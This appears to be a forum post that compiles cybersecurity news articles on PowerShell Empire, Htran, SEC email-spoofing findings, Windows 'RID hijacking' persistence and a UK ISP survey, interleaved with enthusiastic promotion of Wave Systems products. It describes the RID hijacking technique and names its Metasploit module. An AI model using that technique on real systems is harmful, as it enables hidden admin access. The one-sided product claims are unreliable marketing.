It also comes with the added bonus of operating almost entirely in the memory -- making it difficult to trace -- and the fact that because PowerShell is a legitimate operation, malicious activity often goes unnoticed by security software.
Such is the potency of PowerShell Empire, it's become commonly used by both nation states and cyber criminals to stealthily conduct campaigns.
C2 obfuscation tools
Unless they don't care about being discovered, attackers will often look to hide their tracks when compromising a target, using specific tools in order to obfuscate their location and activity.
One which is used in many attacks in Htran, an obfuscation tool which has been freely available on the internet since 2009 and is often reuploaded to places like GitHub. By using this tool, attackers can evade intrusion and detection systems and hide communications with their command and control infrastructure.
The report says a broad range of cyber actors have been observed using Htran in attacks against both government and industry targets.
The cyber security agencies warns that these are far from the only freely available hacking tools available to attackers. However, there are a number of steps that organisations can take to improve their chances of not falling victim to campaigns using these or similar tools.
Recommendations by the NCSC include using multi-factor authentication, segregating networks, setting up a security monitoring capability and keeping systems and software up to date.
=================================================================
Recommendations should say: consider using better multi-factor authentication (security) like Wave VSC 2.0!!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
White paper (great read):
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
I included Wave Endpoint Monitor link because RATs were discussed in the article above and WEM successfully deals with them and many other extremely difficult to spot malware.
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/ - For excellent cybersecurity products that for the moment appear to be undiscovered. Better security at less than half the cost!!
Don’t Let Spoofing Fool You – SEC Says Internal Accounting Controls Should Address Cyber Threats
https://www.jdsupra.com/legalnews/don-t-let-spoofing-fool-you-sec-says-72692/
On October 16, 2018, the SEC released an Investigative Report detailing recent email spoofing schemes that caused nine public companies to lose a total of nearly $100 million. Building on its February 2018 guidance about the need for cybersecurity controls, the SEC wrote that the success of these cyber attacks underscores the need for issuers to “consider cyber-related threats when devising and maintaining their internal accounting control systems.” While the SEC chose not to bring enforcement actions in connection with these incidents, the Investigative Report further underscores the SEC’s focus on cybersecurity and is a strong reminder that the SEC will examine public companies’ controls, including disclosure controls, in the wake of a cyberincident to determine if the securities laws were violated.
February 2018 SEC Guidance on Cybersecurity
In February 2018, the SEC issued guidance about Public Company Cybersecurity Disclosures to assist public companies in preparing disclosures about cybersecurity risks and incidents. “Given the frequency, magnitude and cost of cybersecurity incidents,” the SEC stated “it is critical that public companies take all required actions to inform investors about material cybersecurity risks and incidents in a timely fashion.” The guidance described the importance of implementing comprehensive policies and procedures related to cybersecurity controls, including disclosure controls, and stressed the need to have in place policies to guard against insiders trading on material nonpublic information about cybersecurity risks and incidents.
Since issuing its February guidance, the SEC has brought enforcement actions against companies related to cyberincidents. In April 2018, the SEC announced a $35 million settlement with Yahoo!, the first settlement with a public company related to misleading investors by failing to disclose a data breach. And, in September 2018, the SEC brought its first-ever charges relating to a violation of the Identify Theft Red Flags Rule, fining Voya Financial Advisors Inc. $1 million stemming from a cyber attack that compromised personal information of over 5,000 customers. See our previous discussion of the Voya action for more information.
Details of SEC Investigative Report on Email Spoofing
On October 16, 2018, the SEC released an Investigative Report summarizing the SEC’s investigations into nine public companies that “were victims of cyber-related frauds” and “may have violated the federal securities laws by failing to have a sufficient system of internal accounting controls.”
In each instance, company personnel received spoofed or manipulated emails purportedly from company executives or vendors that duped the recipients into wiring money to accounts controlled by the attackers. The targeted employees included accounting personnel and executive-level employees. The financial losses were significant, with each company losing at least $1 million, and one company losing more than $45 million. In some cases, the spoofing schemes lasted months before detection, and some were uncovered only by third parties, not by the companies themselves.
Although the SEC declined to pursue enforcement actions against the companies based on the facts and circumstances of each case, it believed “these examples underscore the importance of devising and maintaining a system of internal accounting controls attuned to this kind of cyber-related fraud, as well as the critical role training plays in implementing controls that serve their purpose and protect assets in compliance with federal securities laws.”
The SEC reiterated its call that “public issuers subject to the requirements of Section 13(b)(2)(B) must calibrate their internal accounting controls to the current risk environment and assess and adjust policies and procedures accordingly.”
Recommendations on How to Guard Against Cyber Attacks
Based on the climate of cyber risk and the SEC’s view that compliance with federal securities laws mandates appropriate controls to address cyber threats, public companies would be advised to consider the following:
• Understand the risks posed by cyber-related frauds. In its February 2018 guidance and recent Investigative Report, the SEC emphasized that “cybersecurity presents ongoing risks and threats to our capital markets and to companies operating in all industries.”
• Consider cyber threats when implementing internal accounting controls. Given the importance of cybersecurity, the SEC has advised public companies that “cybersecurity risk management policies are key elements of enterprise-wide risk management, including as it relates to compliance with the federal securities laws.”
• Implement training and re-training protocols regarding cybersecurity risks. The SEC noted in the Investigative Report that the email scams were not sophisticated, and succeeded in part because company personnel disregarded indications that the spoofed emails lacked reliability and otherwise failed to follow company policies regarding payment authorization.
• Continue to re-assess the adequacy of existing policies and procedures. The SEC observed “the prevalence and continued expansion” of cybersecurity threats, and advised companies to continue to assess whether their internal accounting control systems were sufficient to “provide reasonable assurances in safeguarding their assets from these risks.”
The SEC has sent a clear signal that compliance with the federal securities laws will require public companies to identify and address cybersecurity risks. The SEC’s Investigative Report is just one reminder of the myriad ways in which public companies potentially are vulnerable to cyber threats. It will take diligent and thoughtful effort for public companies not only to meet these technological challenges but to do so in a way that satisfies their obligations under the federal securities laws and the SEC’s developing guidance in this area.
=================================================================
After reading Wave's whitepaper: Wave VSC 2.0, reading the article from JD Supra, and reading the PR from the 5 year master license agreement with the professional financial services company, one would think that CEOs, CISOs for public companies would opt for Wave VSC 2.0 over the other 2FAs to address their 2FA compliance needs. Sticking with the same old 2FA seems like a risky plan with so much at stake!
=================================================================
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
White paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/
Researcher finds simple way of backdooring Windows PCs and nobody notices for ten months
https://www.zdnet.com/article/researcher-finds-simple-way-of-backdooring-windows-pcs-and-nobody-notices-for-ten-months/
"RID Hijacking" technique lets hackers assign admin rights to guest and other low-level accounts.
A security researcher from Colombia has found a way of assigning admin rights and gaining boot persistence on Windows PCs that's simple to execute and hard to stop --all the features that hackers and malware authors are looking for from an exploitation technique.
What's more surprising, is that the technique was first detailed way back in December 2017, but despite its numerous benefits and ease of exploitation, it has not received either media coverage nor has it been seen employed in malware campaigns.
Discovered by Sebastián Castro, a security researcher for CSL, the technique targets one of the parameters of Windows user accounts known as the Relative Identifier (RID).
The RID is a code added at the end of account security identifiers (SIDs) that describes that user's permissions group. There are several RIDs available, but the most common ones are 501 for the standard guest account, and 500 for admin accounts.
Castro, with help from CSL CEO Pedro García, discovered that by tinkering with registry keys that store information about each Windows account, he could modify the RID associated with a specific account and grant it a different RID, for another account group.
The technique does not allow a hacker to remotely infect a computer unless that computer has been foolishly left exposed on the Internet without a password.
But in cases where a hacker has a foothold on a system --via either malware or by brute-forcing an account with a weak password-- the hacker can give admin permissions to a compromised low-level account, and gain a permanent backdoor with full SYSTEM access on a Windows PC.
Since registry keys are also boot persistent, any modifications made to an account's RID remain permanent, or until fixed.
The attack is also very reliable, being tested and found to be working on Windows versions going from XP to 10 and from Server 2003 to Server 2016, although even older versions should be vulnerable, at least in theory.
"It is not so easy to detect when exploited, because this attack could be deployed by using OS resources without triggering any alert to the victim," Castro told ZDNet in an interview last week.
"On the other hand, I think is easy to spot when doing forensics operations, but you need to know where to look at.
"It is possible to find out if a computer has been a victim of RID hijacking by looking inside the [Windows] registry and checking for inconsistencies on the SAM [Security Account Manager]," Castro added.
A dead giveaway is if a guest account's SID ends with a "500" RID, a clear hint the guest account has admin rights and that someone has tampered with the registry keys.
The CSL researcher has created and released a module for the Metasploit Framework that automates the attack, for pen-testing purposes.
"We reached out Microsoft as soon as the module was developed, but we did not receive any kind of response from them," Castro told us. "And no, it is not already patched."
It is unclear why Microsoft hasn't responded, but the researcher has been on a tour this summer, presenting his findings at various cyber-security conferences, such as Sec-T, RomHack, and DerbyCon. A video of his most recent presentation is embedded below.
"As far as I know, there was no internet documentation about this particular attack when I published the blog describing it," Castro told ZDNet. "Since this is a simple technique, I do not think that only my company and I knew about this."
But while some clever hacks like the one Castro has documented have been known to slip through and get no media coverage, they often don't go unnoticed by malware authors.
RID hijacking is simple, stealthy, and persistent --just what hackers like most about Windows flaws. But in this case, RID hijacking appears to have slipped by malware authors as well.
"I am not aware of any malware using this persistence technique," Castro told us. "I asked some malware analysts about it, but they told me they have not seen this implemented on malware."
==================================================================
Trivial Post-Intrusion Attack Exploits Windows RID
https://threatpost.com/trivial-post-intrusion-attack-exploits-windows-rid/138448/
Simple technique enables attackers to leverage Windows OS component to maintain stealth and persistence post system compromise.
An novel post-intrusion attack technique allows hackers to hijack a Windows system component called RID, allowing the adversaries to assign administrative privileges to “guest” and other low-level accounts.
The technique is simple and does not require a lot of sophistication, security researcher Sebastian Castro, who discovered the hack, told Threatpost. Microsoft was notified of the attack technique when it was discovered almost a year ago – and has yet to offer a fix, the researcher said.
“We have discovered and created a new post-exploitation technique called RID Hijacking,” Castro said in a recent blog post. “By using only OS resources, it is possible to hijack the RID of any existing account on the victim (even the 500 Administrator Built-in Account), and assign it to another user account.”
The attack starts in the Relative Identifier (RID), a component in Windows user accounts. RIDs are a label as part of Security Account Managers (SAMs), which describe a user’s varying permissions. SAMs typically have RID code at the end to define user permissions.
Two common RIDs in particular are the focus of the attack: the number 500 is commonly used at the end of SAMs for an Admin account, while 501 is used for a Guest Account.
The hijacking technique effectively manipulates the registry keys storing this information, and modifies the RID with accounts. So, the 501 labeling a guest account would be changed to 500, indicating permissions of an administrator.
“After compromising a machine, it is possible to automatize this attack remotely via PSExec, Remote Desktop, Powershell and also by using offensive tools like Metasploit,” Castro told Threatpost. “Since this is a persistence technique and not a privilege escalation vector, it is necessary to have elevated privileges already to deploy the attack.”
The Metasploit software to automatize the attack requires a meterpreter session against the victim – the module for this can be found at the latest official release of the MSF framework at post/windows/manage/rid_hijack, Castro said.
The attack was tested on Windows XP, Windows Server 2003, Windows 8.1 and Windows 10.
The attack does come with drawbacks – it cannot be done remotely (unless the computer is left unprotected on the internet). However, once a system has been exploited, it is difficult to detect.
“It is possible to find out if a computer has been victim of the RID Hijacking attack by looking inside the registry and checking for inconsistencies on the SAM,” he told us. “On the other hand, it is not so easy to detect right when exploited, because this
attack could be deployed by using OS resources without triggering any alert on the victim.”
Castro said he reached out Microsoft as soon as the module was developed in December 2017, but did not receive any kind of response from them.
Microsoft, for its part, told Threatpost that it is looking into the report.
“Microsoft has a strong commitment to security and a demonstrated track record of investigating and resolving reported vulnerabilities,” Jeff Jones, senior director at Microsoft, told Threatpost. “We’re looking into this report, and if we determine we need to take further action to help keep customers protected, we will.?”
==================================================================
This RID hijacking could be a potential problem for many companies as Microsoft has not offered a solution in almost a year. This persistent technique requires elevated privileges and they are needed to deploy the hijack. Wave VSC 2.0 could prevent the attacker from using a computer by not allowing the attacker to use a computer with these privileges. The attacker would have to have the computer (TPM) and the PIN number to deploy the attack and that is obviously much more difficult than a password or other 2FA product that has weaknesses.
https://www.wavesys.com/sales - The source for an excellent product like Wave VSC 2.0 to alleviate a potentially bad problem for companies that own Windows PCs.
https://www.wavesys.com/products/wave-virtual-smart-card
UK ISPs: Government Must Take Lead on Cybersecurity
https://www.infosecurity-magazine.com/news/uk-isps-government-take-lead-on/?utm_source=dlvr.it&utm_medium=twitter
The UK’s ISPs have called on the government to streamline the number of regulatory bodies dealing with cybersecurity, improve cybercrime reporting processes and set minimum standards for the industry.
The latest survey from the Internet Services Providers’ Association (ISPA) found that 88% suffer regular cyber-attacks: half of these on a daily basis.
However, they’re responding appropriately. Cybersecurity is a high or very high priority when it comes to day-to-day operations for 61% of ISPs, and an overwhelming 94% said they expect to increase investment in the area over the next three years.
Some 86% also plan on implementing the NCSC’s Active Cyber Defence strategy, which the GCHQ body claimed this week had driven some encouraging results over the past two years.
ISPs are very much on the front line when it comes to cyber-threats facing their customers, so it’s heartening that all respondents claimed the industry should play a proactive role in handling attacks, while 78% said they already offer cybersecurity services to their customers.
However, there appears to be a distinct lack of confidence in the government’s role, especially when it comes to the regulatory environment.
“Despite increased awareness about the importance of cybersecurity, government and law enforcement must turn their words into actions,” argued ISPA chair, Andrew Glover.
“In order to ensure the UK has an effective cybersecurity regime, the government should streamline the number of organizations involved in the cybersecurity landscape to minimize confusion. This needs to be underpinned by clear minimum standards on cybersecurity, set by government, and improved online cybercrime reporting processes.”
Some 40% of ISPs believe the response to cybercrime could be improved if there was better collaboration and coordination within the industry, although half currently don’t share their experiences with peers.
The industry also believes law enforcers need to get better at tackling online crime.
Nearly two-thirds (62%) of respondents said cybercrime handling would improve if police took a more coordinated approach, while 31% suggested that better cybercrime training was necessary. These were also the top two priorities reported in the 2016 survey, showing progress has not been made thus far.
It was revealed earlier this year that UK police spent £1.3m on cybersecurity training over the past three years.
==================================================================
An activated TPM should be a part of these minimum cybersecurity standards. What can activated TPMs do for organizations:
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
=================================================================
If Lord Renwick (worked for Wave) or someone like him could promote TPMs and Wave software capabilities, the UK government would be having more conversations with Wave Sales about Wave's products and the amazing things they do! Not having an activated TPM as part of minimum cybersecurity standards seems like a lack of intelligent thinking. imo. 150+ companies backing the TPM standard, breaches and cyber attacks everywhere and the TPM is still not being recommended as at least a minimum standard by governments?!!? Its better than the existing software security alone that leaves corporations and governments insecure!
=================================================================
https://www.wavesys.com/sales